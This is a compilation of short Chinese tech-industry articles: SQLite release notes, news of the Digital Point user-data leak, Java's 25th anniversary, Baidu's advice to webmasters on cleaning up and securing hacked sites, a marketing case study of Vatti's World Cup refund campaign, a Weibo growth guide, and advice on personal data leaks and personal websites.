添加了四个新的输出模式:“box”、“json”、“markdown” 和 “table”。 “column”输出模式会自动扩展列以包含最长的输出行,如果之前未设置,则自动打开 “.header”。 “quote”输出模式支持 “.separator”。 CLI 内置了十进制扩展名和 ieee754 扩展名。 7.改进 Query planner: 添加了使用 INDEXED BY 查找查询的全索引扫描(full-index-scan)查询计划的功能,该计划以前会因 “无查询解决方案”而失败。 尽管存在错误信息,但可以更好地检测丢失,不完整和 / 或不可靠的 sqlite_stat1 数据,并生成良好的查询计划。 提高了查询性能,例如 “SELECT min(x) FROM t WHERE y IN (?,?,?)”(假设在 t(x,y) 上具有索引)。 8.在 WAL 模式下,如果写入器崩溃并使 shm 文件处于不一致状态,则即使存在活动的读取事务,后续事务现在也可以恢复 shm 文件。在此版本之前,该情况下的 shm 文件恢复将导致 SQLITE_PROTOCOL 错误。 #### 世界上最大的网站管理员社区泄露超86万用户信息 9月8日 消息:据zdnet报道,一个属于Digital Point网站管理员论坛的数据库泄露了超过 80 万用户的记录。 总部位于美国加州Digital Point自称是“世界上最大的网站管理员社区”,平台汇集了自由职业者、营销人员、编码人员和其他创意专业人士。 7 月 1 日,有安全研究人员发现了一个不安全的Elasticsearch数据库,其中包含超过 6200 万条记录,泄露的数据包括超过 86 万Digital Point 用户。 泄露的信息包括,姓名、电子邮件地址和内部用户ID号。此外,内部记录和用户发布的详细信息都存储在开放数据库中。 除了用户数据盗窃和网络钓鱼等常见安全问题,该数据库可能已经成为众多屈服于Meow Bot的一个,Meow Bot是一个自动化脚本,在 7 月份造成了数千个不安全的MongoDB和Elasticsearch数据库的安全漏洞。 研究人员表示,“没有密码保护数据库的危险之一是,它是一个等待被窃取、加密或删除的目标。” 7 月 1 日,研究人员已经向Digital Point发送了一份负责任的披露通知,这一警报受到重视,并在数小时内取消了对该数据库的访问。 #### 世界排行第一程序语言:java迎来25岁生日 作为全球排名第一的编程语言,本周末Java将迎来 25 岁生日。 Java起源于 1991 年的“ Oak”项目,由James Gosling领导。面向对象的Java以其“一次编写,随处运行”的可移植性而闻名,因为Java虚拟机支持多种硬件平台和操作系统以及Java applet可以从网页上运行。Java小程序多年来提供号称优于JavaScript的性能,但后者最终受到浏览器制造商的青睐,并于 2018 年将Java从浏览器中删除。 与目前常用的C++相比,java语言简洁得多,而且提高了可靠性,除去了最大程序员错误根源,此外它还有较高的安全性,可以说它是有史以来最为卓越的编程语言。 java语言编写的程序既是编译型的,又是解释型的。程序代码经过编译之后转换为一种称为java字节的中间语言,java虚拟机(JVM)将对字节进行解释和运行。编译只进行一次,而解释在每次运行程序时都会进行。编译后的字节码采用一种针对JVM优化的机器码形式保存,虚拟机将字节码解释为机器码,然后在计算机上运行。java语言程序代码的编译和运行过程如:程序源代码——编译器——字节码——JVM(虚拟机)——机器码(010010...)——计算机。 Java在 2006 年末开始开源。当Java公司于 2010 年 1 月收购Sun时,Java的管理权移交给了Oracle 。Oracle 在 2017 年向Eclipse Foundation推出了Java的企业版Java EE ,但仍保持基本的Java标准版。现在,标准Java每六个月发布一次,而以前通常是三年左右。 为庆祝Java25 周年,Oracle还启动了最佳JDK功能对抗(Best of the JDK Feature Face-Off)票选活动,投票将于 5 月 26 日上线。 #### 世界杯到了,百度提醒你小心网站被挂马 2022年卡塔尔世界杯即将来临,以棋牌类,赌球类,竞猜类等内容为主的黑产猖獗,近日百度搜索发现网站被黑的情况日益严重,故特发此公告提醒各大站长,时刻关注网站安全,做好网站防护工作,警惕自身网站被黑产利用。 站长先了解网站被黑在搜索结果中的展现情况,示例: 1、在百度搜索结果中网站展现“安全中心提醒您”风险提示字样。 2、通过site语法搜索站点域名+色情、博彩类词汇,搜索结果中展现不属于网站的非法页面、非法违规标题和摘要等。 搜索site:www.xxx.com 棋牌 确认被黑之后,如何快速解决? 网站被黑,表明网站自身安全可能存在严重漏洞,技术人员应迅速采取手段修复,防止再次被黑。 其次,网站运营人员及时清理被黑内容。 1、自查和梳理网站被黑资源:通过搜索资源平台【流量与关键词】工具查询、site语法搜索等,同时可以分析排查出可能的被黑时间,和服务器上的文件修改时间相比对,清理掉黑客上传、修改过的文件。注:可以从访问日志中,确定可能的被黑时间。不过黑客可能也修改服务器的访问日志。 2、页面404:清理发现的全部被黑内容,将被黑页面设置为404死链。不可将被黑页面跳转至首页。 3、提交死链:全量404死链数据,通过百度搜索资源平台-【死链提交】工具进行提交,关注死链抓取和生效情况。 最后,给站长一些安全防护的建议:可多种策略同步进行 1、网站系统勤打补丁,保持网站平台和软件的最新版本。 2、对服务器进行安全防护 3、不建议使用开源程序默认的robots文件 4、进行HTTPS改造,强化网站安全 5、尽可能关闭非必要端口,防止被端口入侵。关闭或限制不必要的上传功能。 6、安装官方权威的第三方服务器防护软件,设置防火墙等安全措施。 7、定期检查服务器日志,查看是否有可疑访问,并做好相关数据备份。 最后,若您的网站不幸出现被黑情况,请参考【指南】网站被黑怎么办—网站被黑操作指南采取相关措施及时解决,遇到问题需要咨询,可以通过反馈中心及时联系我们。 #### 世界杯最成功的营销:华帝全额退款 来源:三节课(微信公众号:sanjieke01) 作者:吴思 张成翼 今天(7月16日)凌晨, 2018 俄罗斯世界杯帷幕落下,法国队时隔 20 年后再次夺得世界杯冠军。再次成为冠军的法国不仅本身成为全国上下的话题焦点,也让一个多月前就声称“法国夺冠,华帝退全款”的华帝公司进入舆论的中心。打开微博和朋友圈,到处都在讨论这个问题,一些人惊叹这次营销活动的成功,更多的则是在关心,华帝退全款到底靠不靠谱,华帝会不会亏得很惨? 事实上,就我们观察来看,华帝在这次活动中不仅不会有任何亏损,反而是一次成本不高,但效果极佳的营销活动。接下来,我们就和大家一起复盘一下华帝在世界杯期间围绕“法国夺冠,华帝退全款”的一系列运营活动。 一次成功的下注 华帝的这次活动其实是“蓄谋已久”了。 3 月 5 日,华帝正式与法国队签约,成为法国队官方合作伙伴,并声称法国是本届夺冠热门。此时距离世界杯开幕还有足足三个月的时间。 华帝此次选择法国队作为赞助球队,并不是拍脑袋决定的,而是经过反复思考的。一是,从开赛前的赔率上看,作为传统强队,本届世界杯中法国的夺冠赔率在 32 支球队中排名第5,仅次于巴西、德国、西班牙和阿根廷这些传统强队。其次,法国队也是这一届世界杯最“贵”的球队,球员薪资总和排名第一, 23 名球员总身价接近 10 亿英镑(约合 88 亿人民币),其实具有相当不俗的实力。但实际上,在绝大多数普通观众眼中,法国只是一支历史曾经辉煌过的二流球队,稍稍熟悉一点的,可能还停留在齐达内的时代。所以,选择法国队,既让大多数观众感到意外,又有比较大的概率有比较长的宣传期,这个选择并不是拍脑门决定的。 确定了球队之后,如何尽可能的扩大这件事的影响力,就成为摆在华帝营销团队面前的难题,我们来看看,华帝是如何做的? 5 月 30 日,世界杯开赛前半月左右,华帝买下权威媒体《南方都市报》一整个版面,发布广告,承诺“法国队夺冠,华帝退全款”。同时宣布的,还有退款活动的玩法,只要用户在 6 月 1 日 0 时至 6 月 30 日 22 时之前,购买了冠军套餐产品,若法国队夺冠,华帝则全额退款。 次日,该消息迅速在社交媒体上传播,经过华帝代言人林更新的转发,迅速刷爆微博,包括参考消息、新浪财经等数十家媒体报道,华帝搜索指数直线上升; 6 月起,华帝开始在线下大批量的投放此广告,活动的声势进一步扩大。 本来这件事到这里,华帝的营销团队并没有更多的动作来刺激旋转,但是,一个意外事件,让这个活动从球迷圈子里的一个趣味话题,成为了全社会的一个热点事件。 6 月 29 日,华帝第二大经销商,北京、天津地区代理商总经理王伟失踪, 7 月 2 日,华帝的股票开盘即触及跌停,创出21. 99 元新低,收盘时股票下跌9.99%,市值蒸发 14 亿元。由于信息的不充分流通,网上不断有声音将股票的下跌与华帝退全款的活动联系起来,顿时吸引了大量的关注,也就是从这个时候开始,人们开始好奇,华帝的营销活动究竟靠不靠谱。 而华帝的反应也很快。 6 月 30 日,法国队淘汰阿根廷队,顺利进入 8 强,这个让吃瓜群众有些出乎意料的结果顿时引爆,也让法国一些成为了大众心中的夺冠热门,华帝也趁势宣布活动延期 3 天,进一步刺激了活动的热点。 之后,法国队淘汰乌拉圭进入四强,战胜比利时进入决赛,“华帝退全款”的海报与截图都会被翻出来讨论,获得大量流量。 7 月 16 日,法国队夺冠后几分钟后,北京时间 0 点 54 分,华帝的官微和公众号迅速发布了事先准备好的退款流程。此时此刻,大家一方面十分关注世界杯的结果,另一方面,大多数人对于“华帝是否退全款一事”一定会怀有好奇和围观心理,如果有消息也一定愿意传播,参与进来。无疑这个时候为此次营销活动收尾会是一个最佳时机。华帝团队迅速的动作也确实抓住了这个时机,华帝也登上了微博热搜第 2 名。 值得注意的是,此次退款并不是退现金,而是天猫超市卡、京东E卡、苏宁礼品卡或者美通卡(物美超市的储值卡)。这其实相当于,华帝就是在做一次在常规预算内的营销活动,而在此过程中,所获得的流量超乎想象。 总结来看,无论是球队的选择、广告渠道的选择、活动玩法的确定、运营节奏的把控、推送的及时性来看,华帝此次的营销活动都做的非常好。华帝all-in法国,其实是一次非常成功的下注。 对于我们来说,应该如何借鉴呐? 成功的活动应该如何设计 应该说,华帝这次活动设计,其实遵循了一些很基本的活动运营的方法的规律,总结来看,可能有以下几点: ▌成功的玩法设计 华帝的玩法设计其实遵循了两个活动玩法设计基本要素——物质激励与概率性事件。 在三节课运营P2 课程的活动运营的课程中,提到了九种活动设计的要素,包括有物质激励,概率性事件,稀缺感,竞争对比,炫耀猎奇、营造情绪、尊崇视感、低成本、有趣、获得超值体验等等。其中,物质激励与概率性事件是最常用的两种。 物质激励是能够直接驱动用户参与,而概率性事件是能够很大的刺激人们参与到活动当中,因为谁都会想试试这个手气。 而华帝再结合到世界杯的热点,将这个概率与世界杯决赛冠军相挂钩,很大幅度的提升活动参与度。 ▌合理的成本控制 华帝在这个活动中做的另一件事是,他的成本控制其实做的非常好。 7 月 4 日,在营销活动截止后,华帝发布了一则公告,根据华帝初步统计,活动期间“夺冠退全款”指定产品的线下渠道销售额约为 5000 万元,线上则约为 2900 万元。按照营销方案,华帝总部只承担线上自营的免单退款,而线下售出产品的免单退款则由经销商负责。 同时,此次“退全款”活动销售总额约为 7900 万元,华帝总部及各级经销商需要承担的是生产成本、进货成本和部分促销费用,实际支出金额应该低于 7900 万元。 低于 7900 万是什么概念,小编在这里只说一个数字, 2017 年全年,华帝的销售额为 60 亿元。一般来说,公司的营销预算通常都能占到预算的2%~3%左右,也就是说,华帝全年的营销预算至少在1. 2 亿元到1. 8 元之间, 7900 万元对于华帝来说,真的不算压力。 而且, 7900 万元,全部花出去,也只有在法国夺冠的情况下成立,假设法国没有夺冠,那么华帝几乎就是一分钱没花,就获得至少 8000 万元的销售额增长。 从实际来看,华帝也确实没有亏,而且是赚大了。 这次长达一个月的营销活动中,华帝的收益可以分几个部分来看: 1、销售额增长 华帝官方发布的数据显示,在世界杯期间,华帝线下渠道销售总额在 7 亿元以上,同比增长20%左右,线上渠道总销售额 3 亿元,同比增长30%以上。根据这个数据,我们再来进一步算一下: 线下渠道总销售额 7 亿元以上,同比增长20%,意味着世界杯期间同比增长的销售额是7-7/1.2=1. 2 亿 线上渠道总销售额 3 亿元以上,同比增长30%,意味着世界杯期间同比增长的销售额是3-3/1.3=0. 7 亿。 也就是说,这波世界杯的营销在短短一个月内,就增加销售额近 2 亿元左右。小编对家电类的利润率不太了解,不过按照行业平均毛利30%左右来看,其实增加的利润就基本可以覆盖掉营销成本了。 2、品牌效应 这次华帝的营销活动,获得了极大的品牌效应。一方面是在知乎、马蜂窝等广告被广泛吐槽的情况下,华帝“以小博大”的营销方式为其带来广泛的赞誉,另一方面,这波营销确实带来实打实的巨大流量。我们从几个指标来看: 微信指数 为了能让大家对此次曝光程度有所了解,我们拿投了 10 亿元,借由梅西的一张广告图同样获得比较好传播效果的蒙牛来做对比。 从微信指数上来看,在世界杯开始之前,一直搜索指数高于华帝的蒙牛,在世界杯开始之后,就多次被华帝大幅超出,而今天的数据更是只有华帝的三分之一,最高时华帝的微信指数超过300w。 百度指数 如果说,微信指数仅代表移动端的数据,尚不足以说明全网状况,我们再来看看百度指数。百度指数上,华帝也超过蒙牛 3 倍多。除了几个明显的波峰之外,随着时间的推移,华帝的搜索指数也是呈现逐步上升的趋势,进入 7 月以来的均值明显高于 6 月。 社交媒体 在世界杯开始之前,华帝的微博几乎没有转评赞,是个互动很少的账号,而 5 月 31 日宣布“法国队夺冠,华帝退全款”的微博已有 4 万转发,今天凌晨刚刚发布的退款流程,更是在短短几个小时已有 1 万转发, 3 万点赞,按照10%的阅读点赞比来算,今天一天的浏览量也有30w。 而在微信上,刚刚发布的“华帝退款流程”公众号推文几个小时内已经迅速突破了十万加,随着时间的推移,这个数字也会不断增加。 换句话说,仅仅在今天一天之内,官方微博和官方微信两个渠道的阅读量就有近百万,这还不算大量报道媒体中的品牌露出。而这只是一天的量,世界杯的热度持续了一个月,华帝在这期间曾多次成为话题中心,可以预见其获得的流量很可能是逼近甚至超过千万的。 算到这里,可以看出,华帝不仅仅是不赔,反而是大赚了一笔。如果要想获得获得华帝现有的知名度和品牌曝光量,在不借助热点,正常情况下,很可能要花8000w数十倍的钱。看看蒙牛,就会发现,花了数十倍的钱,也可能达不到这样的传播效果。 这样一算,是不是就不心疼华帝了。 几点想法 回顾整个活动下来,我们认为有这样几点是值得每一个运营人借鉴的。 ▌蹭热点的姿势要正确 华帝活动能够成功,还有一个重要的背景就是世界杯的热度。 华帝找到了一个很好的噱头就是“法国夺冠军,华帝退全款”。这当然是因为华帝有着更充足的营销预算。但是,对于每一个运营人来说,我们其实也要学会找到这样的噱头,来蹭热点,甚至是“炒”热点。 举个例子,之前我们写过关于懂球帝在德国队出具之后的一系列动作,就是一次热点事件爆发后,快速的跟进,评论,炒作,获得了一大波流量。 #### 世界邦旅行网倒闭了 创始人发朋友圈道别 6月11日 消息:近日,专注于出国自由行的世界邦旅行网多位员工在社交媒体爆料,因受疫情影响,公司将停止运营。6 月 10 日,世界邦创始人赵新宇发布了一条朋友圈“盼君珍重,来日方长”,似乎向业界表达世界邦停止运营的消息。 目前,世界邦旅行网官方微博也关闭评论功能,此前也有网友评论咨询是否倒闭。 公开资料显示,世界邦成立于 2012 年,汇聚全球1, 000 多名旅行达人,活跃用户超过一千万,旅游服务及资源覆盖欧洲、美洲、大洋洲、亚洲、非洲等地区的六十多个国家、数千个城市。成立以来,获得杨致远等著名天使投资人和新浪集团、复星集团等机构的战略投资。 #### 东壁全球科技文献数据平台 7月2日,北京 - 在今日开幕的2025全球数字经济大会上,由中国机构独立研发并拥有完全自主知识产权的“东壁全球科技文献数据平台”正式发布上线。该平台的上线,标志着我国在科技文献服务领域取得重大突破,将有力打破西方机构在该领域的长期垄断地位。 平台核心优势: 规模庞大,自主可控: 东壁平台整合了全球近9000万条高质量科技文献元数据(索引信息)。这些数据完全依据中国自主提出的评价标准进行采集、加工和建设,确保从源头到应用的数据安全自主可控。 智能服务,AI赋能: 平台创新性地引入了两大AI功能: “学者成果解读”: 用户可以用自然语言向AI助手提问,快速了解特定学者的研究方向、特色成果及学术贡献,甚至进行学者间的对比分析。 “综述自动生成”: 利用AI技术辅助用户高效生成研究领域的综述内容。 普惠开放: 平台上线后,其核心的文献检索、引文分析和数据追踪等基础功能,将对全球用户免费开放。这为我国广大科技工作者提供了更便利、更普惠的研究工具,将有效助力高质量科研工作,推动国家科技事业发展。 目前仅能通过英文搜索内容 建设背景与意义: 专家指出,科技文献数据平台是科研活动中不可或缺的基础设施,贯穿从选题、调研、实验设计到成果验证与推广的全过程。然而,长期以来,全球科研人员高度依赖的文献数据库主要由西方少数国家的商业出版机构掌控,存在潜在的数据访问限制或服务中断风险。因此,建设一个安全可靠、自主可控的国家级科技文献平台,对保障我国科研工作的独立性和安全性至关重要。 #### 东方IC、摄图网等5家图片网站被上海市版权局约谈 4月22日 消息:日前,视觉中国黑洞照片版权问题引发巨大争议,后视觉中国多次道歉。4 月 18 日,天津网信办对视觉中国做出30万重罚款的处罚 。 据东方网报道,2018 年度上海十大版权典型案件新闻发布会上获悉,上海市版权局已约谈东方IC、摄图网、包图网、我图网、上海微图等 5 家沪上知名图片类互联网企业,要求企业加强自查自纠,全面深入查找问题并及时作出整改。相关企业已经下架五万张涉嫌“问题”图片。 国家版权局要求各图片公司健全版权管理机制,规范版权运营,合法合理维权,不得滥用权利。国家版权局将把图片版权保护纳入即将开展的“剑网2019”专项行动,进一步规范图片市场版权秩序。 #### 东方财富股吧因网络问题突然崩了 目前已恢复 11月12日 消息:11月12日上午,有网友反应东方财富股吧“崩了”,股吧打不开,最新评论、最新发帖均显示“暂时没有数据”。 目前,针对无法打开等问题,东方财富相关工作人员表示由于网络的原因,股吧栏目受到了影响,目前已经全部恢复,其他产品和服务的使用一切正常。 今年10月,同花顺APP出现大面积故障,出现无法正常登录、无法查看自选股、无法查看交易账户等情形,而当天市场出现了大跌。 看来云服务时代,网络稳定性还是有待提升的。 #### 个人QQ已无法发起临时会话 需要企业QQ才可以 最近,有站长向主机邦反馈,网站上临时会话QQ无法使用。 主机邦试了下确实无法正常使用,于是我联系上了shang.qq.com网上的QQ客服,得到的答案是个人QQ的网页临时会话功能已经停止很久了,目前只有购买企业QQ才可以发起网页临时会话,而价格最低3用户起,一年999元,想当昂贵。 如果个人网站博客之类的,想用QQ临时会话是不可能的了,成本太高了。 #### 个人企业如何运营微博,微博如何推广攻略 为什么要玩微博? 1:重要性 现在提到新媒体,大家都会想到双微,对于个人和企业来说,除了微信另外最重要的就是微博了,而近期微博的市值也已经攀升到200亿美元,微博的月活跃用户也超过3.6亿。而一旦有大事发生我们首先还是从微博知道的比较多,微博是一个公开的圈子,同时也是一个很好的公关渠道,相对于公众号来说每天发布次数不受限制,更加灵活自由。 2:对个人的意义 微博对于个人来说,也有诸多意义。对于普通人来说,我们可以方便的记录生活,同时我们也可以更贴近的了解自己想要关注的大佬的最新动态,同时还可以跟他们进行互动。对于公众人物来说,我们可以借此打造个人品牌,积累影响力。对于有才艺的人来说,我们可以通过展示自己的绘画,文学作品,或者哪怕像中国第一狗仔一样,追名逐利,也未必不是没有可能。 3:对企业的意义 一般而言,企业建立微博的目的和公众号也是大同小异的。首先就是别人在建立全媒体渠道,因此我们公司也得建立一个,要不然单一渠道流量就被竞争对手完全抢光了;其次就是刚才所提到的微博是一个很好的媒体公关工具,可以快速的谣言进行癖除;微博还可以帮助企业建立销售渠道,同时增加更多的品牌曝光机会。 基础篇 1:基础资料设置 昵称:企业名称一般为公司名或者品牌名,大多数为公众所知道的品牌名称。个人昵称一般和其他平台昵称保持一致,同时也能突出自己个人特点或者地域,或者行业等,同时微博昵称具有唯一性,因此在选取名称时候要注意有自己的特色,不要经常改动。 头像:企业以公司logo,个人则以个人头像或者定制。 简介:一般介绍你是谁,你的微博发什么信息,或者其他有特色的简介,或者你需要引流加到微信,也可以写上。 封面图:封面图可以自定义进行设计,然后上传,同时也可以买一些比较好看的图,另外也可以在封面图处加上一些简单的广告介绍。 2:基本认知 橙v和蓝v和金v的区别:橙v指的是个人认证用户,现在按照官方提示上传相关工作证明和证件即可,认证门槛较低。蓝v则是指企业认证用户,可以在微博认证界面详细的查看到认证需要的资料。金v则是针对个人认证用户,同时要求每个月的阅读数达到1000万才可以,也是动态更新的,也就是在30天内阅读数不够也会掉的。 微博与头条文章的区别:微博是指140字的短信息,相当于微信的朋友圈和空间的说说等。而头条文章则是一种长微博,相当于微信公众号图文和空间的日志。 微博自媒体与微博签约自媒体:微博自媒体仅针对个人用户,是微博官方为了帮助更多有品牌、有影响力的作者成长。仅针对文章作者而言,微博自媒体需要每月发表超过5篇文章,且至少单篇超过1000阅读,总阅读过1000;而微博签约自媒体则要求月头条文章阅读超过100万。成为微博签约自媒体将优先享受功能内测,同时也会有更多的赚钱渠道,还有重要的一点就是会得到官方的加权推荐,有可能增长更多的粉丝。 3:基础功能 自定义菜单:这个菜单和公众号菜单大致相同,我们可以放一些链接或者个人简介。 私信功能:通过私信功能我们可以直接找到想要联系的人然后私信对方合作,当然别人是否回你,那就不一定了。 转发艾特:当我们有某一条图文特别想要自己的朋友看到的时候,我们可以在转发的时候艾特一下对方,或者说到某个事情的时候,对方是人物之一,那么也可以艾特下。 话题:也就是带井号的,两个井号中间的字一般在8个以内,每天微博上都有很多热门的话题,关系到政治经济或者娱乐等等,我们可以通过这些热门话题来了解到每天得重大新闻有哪些。 置顶:就是把自己发表的微博或者文字等动态,选择性的放在最新一条,这样做的好处是可以让进来的人能够第一时间看到,避免刷屏错过。 4:微博发布时间与频率 一般而言,微博发布的关键时间点也为早中晚三个时间段,即早上上班路上的时间,中午吃饭午休的时间,以及晚上吃饭和晚上睡觉之前的这四个时间左右。因此选择合适的时间可以让我们的微博触及到更多的人群。同时我们也需要注意自己发布微博的频率不要过高,一般而言不建议超过6条,而且间隔时间最好超过2个小时,因为如果一个人关注微博数较少,那么你的微博就相当于朋友圈刷屏,会让人感觉到反感。 5:小技巧 为了避免忘记按时发布微博,我们可以选择定时工具,比如皮皮精灵,把已有内容放进去,设置好时间即可。同时微博关注人数不宜过多,如果一个人关注了很多人,说明这个人只是为了互粉,或者说看着不像大咖,那么会降低其他人的愿意关注度。同时因为我们关注的好友比较多,有时候只想看重要好友,那么就需要在平时的过程中设置特别关注的分组,也要记得给熟悉的好友改备注,否则就不知道谁是谁了。 个人篇 1:个人可以用微博做什么? 互动:可以通过给自己关注的名人进行私信或者评论留言互动 记录生活:可以记录自己生活中的感想或者照片 发泄情绪:对于普通个人用户来说,关注的人比较少,一般都是核心好友,所以可以通过微博来吐槽,这样避免被其他人所关注到,因为微博一般也不是用的真名。 参加活动:比如参加抽奖活动,参加一些签到打卡类的活动 2:个人微博如何提升阅读数? 蹭热点:一般娱乐类热点比较容易吸引到关注,比如演唱会的视频,或者明星爆料,这个时候跟热点速度要快,同时文字和图片要有吸引力,可以关注一些娱乐类大v,或者关注话题,综合分析,找出关键词,有可能截流部分,一条微博达到几十万阅读还是很容易的。 增加被转发概率: 能够吸引大家愤怒,想要转发表达自己的立场。干货类微博,趣味性微博,或者及时性微博以及救灾捐款之类的,大家都还算比较愿意转发的。记得加上话题,这样可以让更多的人看到你发的微博。 3:个人微博如何提升粉丝数 优质内容:可以通过原创微博和头条文章,进行长期坚持加上蹭热点,得到转发后也是有机会涨粉的。 投稿:如果文章写的不错,可以给知名大号投稿,标注来源或者被艾特一下,也是可以涨粉不少的。 美女晒照炫富:利用美女头像,晒每天到处吃喝玩,以及花了多少钱等,满足部分人的心理。 微信公众号引流微博:如果你的公众号粉丝比较多,那么可以发图片。末尾引导大家关注微博参加诸如有奖转发类的活动。 蹭热点,抢话题主持人:根据热点迅速建立话题,然后自己抢主持人,这样可以让自己发的微博在显著位置,得到曝光,吸引关注和转发。 评论猎奇:去其他大号下面进行评论,发段子或者有争论的评论,或者曝光装逼等等,能吸引其他人的眼球即可。 事件曝光:作为重大新闻事件的曝光人,都会被记者写在稿子里面从什么微博上曝光的,这样能吸引到很多外部流量。 4:如何将个人微博打造成自己对外展示的一个窗口? 首先如前文所说的,把基础资料包装好,让人看着是那么回事;其次内容要根据自己的定位比较垂直,同时别发其他乱七八糟的内容;最后就是要有意识的带上话题。 企业篇 1:明确建立企业微博的目的是什么? 对于企业来说,一般有如下目的,当然有的也只是部分目的。 打造品牌:简单说就是增加粉丝数,让更多人关注,让更多的人知道有这个品牌的存在,通过微博上不断的刷存在感,默默的影响人们的购物观念,或者对于这个品牌的印象。 公关:这个不一定是在企业出现负面危机的时候才会用到的,有时候公司产品有问题,可能顾客通过微博私信就及时的了解问题,防止问题扩大化,还有可以接受顾客的建议等,都是可以的。 销售:部分品牌会在企业微博上来卖东西,通过秒杀的形式效果也是不错的。 2:如何提升粉丝数? 互推:比如同类目标群体或者不同企业进行异业合作,大家相互转发对方微博,或者利用资源置换的形式,提供礼物,让对方发微博抽奖活动时候规则中要求关注自己。 粉丝通:这个是新浪官方的一个广告平台,通过这个系统可以精准的推广自己的微博或者精准增加粉丝,可以根据地区、性别、年龄、兴趣等条件来推广你想要推广的东西。 微博红包:每年过年期间,通过给自己或者其他微博里面塞红包,然后普通个人微博去抽红包时候就会自动关注你的微博了,一般而言,大概1元1个的成本。 有奖转发:通过提供自己公司产品,或者当下最流行的产品,让大家通过关注转发等行为来帮助微博进行涨粉。 3:企业微博可以做哪些活动? 做活动之前要考虑哪些问题? 活动目的:是为了增加粉丝,还是曝光,还是引导区下载app或者增加销售 应该选择什么样的礼品?如果你想要吸引粉丝,那礼品要符合自己粉丝定位,要不然一方面没人参与,另外参与进来的都不是自己想要的粉丝。 活动预算:算下自己要花多少钱,才能达到什么样的效果,是否值得。 活动噱头:一般做活动,都是有原因的,比如为了庆祝什么,或者什么节日。 有奖活动:也就是前面所说的有奖转发。砸金蛋,有奖转发,有奖征集,免费试用等。 产品调研:可以通过有奖征求大家的建议和意见,一方面增加和粉丝的互动,另外还可以改善公司的产品。 征文活动:征集公司和用户之间的故事的活动 投票活动:通过投票,吸引部分人关注,同时投票界面也会得到更多的曝光,而且拉票的人也会转发相关微博。 中奖篇 玩了微博6年,中奖超过100件,下面我将会为大家分享如何在微博上经常中奖。 1:如何区分活动的真假性 是否加v认证:没有加v认证的基本上大部分都是假的,特别是微商做活动送拍立得什么的。尽量选择蓝v微博活动,尽量选择较为知名的大中型公司。 是否使用官方抽奖工具:只有认证用户才能使用这个工具,而且是通过新浪官方系统随机抽取的,因此更加公平可靠。如果是博主自己选择那么很有可能内定,因为我自己也参加过被内定的微博有奖活动。 多观察:观察微博的更多资料部分,看注册时间,另外看微博整体粉丝数一般只有几百个的很难让人信服,还有就是微博总条数,以及以前有没有做类似抽奖活动,看下结果和评论互动数。 2:如何寻找到有奖活动 关注一些名为有奖转发之类的微博,这些微博会经常转发一些有奖活动。 关注一些经常做有奖活动的大公司微博,关注经常参加转发有奖活动且中奖率较高的博主,可以知道很多讯息。 3:怎么样更容易中奖? 根据我的个人经验,达到下面这些条件的更容易被抽中,也就是说会起到加权作用。加v认证的个人用户,微博粉丝数多,比较活跃每天登陆和发布微博。 同时除了这个基础条件,我们在转发微博时候要看清楚规则,需要关注哪几个博主,艾特几个人,只转发,还是需要转发评论,或者转发艾特。 另外在选择参加一个活动的时候尽量选择转发次数较少的,如果转发总次数在100左右,中奖名额10个,那么你的几率就比较大。对我个人而言,一般喜欢转发中型企业,最后转发总数在500以下的。 4:中奖后要做什么? 首先及时注意开奖时间,中奖后及时提交信息,避免过了截止时间。 很多人在收到奖品之后就觉得和企业没有关系了,其实我们应该去晒自己收到奖品并艾特官方微博,表达出自己的感受和感谢,只有你回馈对方,对方才愿意下次继续去选你。而且你经常这样做,以后其他微博也更愿意把奖品送给你。 原文作者:潘东升 #### 个人信息被泄露怎么办 如果您的个人信息被泄露,以下是一些应该采取的行动: 1.确认信息泄露: 首先要确认个人信息确实已经泄露。可以通过查看自己的账户是否被未授权的访问,或者接收到不明来源的电子邮件、短信等方式得知信息泄露的情况。 2.尽快改变密码: 如果您的账户密码已经被泄露,立即更改密码,并确保新密码是强密码,包括使用字母、数字和符号等不同种类的字符。 3.通知相关方面: 如果您的个人信息被泄露,需要及时通知相关方面,包括银行、信用卡公司、社交媒体平台、政府机构等等。同时,也需要向当地的警方或网络安全部门报告。 4.监测账户和信用报告: 您需要密切监测自己的账户和信用报告,以确保没有异常活动或未经授权的账户访问。 5.采取安全措施: 在确保自己账户的安全之前,需要采取额外的安全措施,包括启用双重身份验证、安装杀毒软件等等。 6.学习如何防范: 学习如何防范个人信息泄露,包括避免使用弱密码、不在公共场合使用公共Wi-Fi等等。 需要注意的是,个人信息泄露可能会给您带来严重的后果,包括身份盗窃、财产损失等等,因此需要及时采取措施来保护自己的信息安全。 #### 个人做网站还有前途吗 这是一个很有意思的话题,因为这个话题已经吵了56年了,主机吧为什么今天还聊这个话题呢? 因为最近有一客户也这样问主机吧,所以就聊聊个人做网站还有前途吗? 主机吧先来说答案:有,但也不是全都有。 为什么这么说呢?因为有些类型的网站已经不适合发展了。 比如社区类网站,互动类网站。不管是国内还是国外,论坛社区类网站都已经没落了,前几天Yahoo Groups宣布将永久关站了,这个创建于2001年的网络社区,可以说是最古老的社区了,然而依然顶不住互联网的浪潮,足够说明社区类网站已经没有前途了。那些访客不会花大把时间来注册一个社区帐号,耐心看你发牢骚,发帖子,大家都很忙,没有特色的资源,他们根本不看。所以如果你想做社区类的网站,建议还是尽早放弃吧。 那什么样的网站有前途呢? 1 知识类型的网站 这类网站永远不会过时,因为互联网本身就是一个知识获取的入口,搜索的本质就是寻找知识,所以不管是对访客还是对搜索引擎都是特别喜爱知识类的网站。 2 资源类型的网站 跟知识类型网站一样,资源类型网站也是互联网不可或缺的一部分,比如那些图片网站,素材网站,一些软件站,甚至一些表情包等都是互联网的基础。 3  卖货类型的网站 这种类型网站往往流量很低,但是其收益却是很高,比如主机吧知道的某大牛只做了一个美容化装品网站,网站上都是一些关于美容的文章,然后软广告推荐他们家的美容产品,受益很高,一天就有上万的流水。这有点类似于微商,不过微商是主动推销模式,而网站属于客户主动购买模式,后者成交率更高。如果你也有不错的产品,可以尝试做一个网站,专门介绍这个产品的,然后让客户找你购买,那是不错的选择,主机吧博客也是走这种模式。 4 细分类的网站 细分类的网站就是那种属于小众的网站,比如主机吧认识一位朋友,做的是北京市旅游指南博客,专门写一些北京市上的旅游特色,景点,还拍了一些照片,虽然不是很多,但是都很专注,一些商家就找到他,在他网站上打广告,一个月下来广告费都上万块,后来被某旅游公司看上了,花90几万收购了,可以说狠狠的赚了一笔。 5 短视频类的网站 移动互联网时代的到来为短视频带来了商机,抖音的全球火热就说明了一切,而5G时代的到来更让短视频如虎添翼。如果你有不错的视频创意,会玩视频那么做一个属于自己的视频网站是非常有前途的。 